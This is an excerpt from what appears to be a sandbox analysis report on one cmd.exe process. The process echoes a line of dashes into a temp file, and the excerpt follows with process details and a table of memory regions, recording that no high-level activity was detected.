Command Line cmd /C "echo -------- >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:04:36, Reason: Child Process
Unmonitor End Time: 00:04:37, Reason: Terminated by Timeout
Monitor Duration 00:00:01
Remark No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0xa1c
Parent PID 0x834 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xBB0
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x00000004be240000 0x4be240000 0x4be25ffff Private Memory rw True False False -
pagefile_0x00000004be260000 0x4be260000 0x4be273fff Pagefile Backed Memory r True False False -
private_0x00000004be280000 0x4be280000 0x4be37ffff Private Memory rw True False False -
pagefile_0x00000004be380000 0x4be380000 0x4be383fff Pagefile Backed Memory r True False False -
pagefile_0x00000004be390000 0x4be390000 0x4be390fff Pagefile Backed Memory r True False False -
private_0x00000004be3a0000 0x4be3a0000 0x4be3a1fff Private Memory rw True False False -
private_0x00000004be560000 0x4be560000 0x4be65ffff Private Memory rw True False False -
pagefile_0x00007df5ffaa0000 0x7df5ffaa0000 0x7ff5ffa9ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff60cef0000 0x7ff60cef0000 0x7ff60cf12fff Pagefile Backed Memory r True False False -
private_0x00007ff60cf1d000 0x7ff60cf1d000 0x7ff60cf1efff Private Memory rw True False False -
private_0x00007ff60cf1f000 0x7ff60cf1f000 0x7ff60cf1ffff Private Memory rw True False False -
cmd.exe 0x7ff60d9c0000 0x7ff60da18fff Memory Mapped File rwx True False False -
kernelbase.dll 0x7ff9753d0000 0x7ff9755acfff Memory Mapped File rwx False False False -
kernel32.dll 0x7ff977ab0000 0x7ff977b5cfff Memory Mapped File rwx False False False -
ntdll.dll 0x7ff977f30000 0x7ff9780f1fff Memory Mapped File rwx False False False -